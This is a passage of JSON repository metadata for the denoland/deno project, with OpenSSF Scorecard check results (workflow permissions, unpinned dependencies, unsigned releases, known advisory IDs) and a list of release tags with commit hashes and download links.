.github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2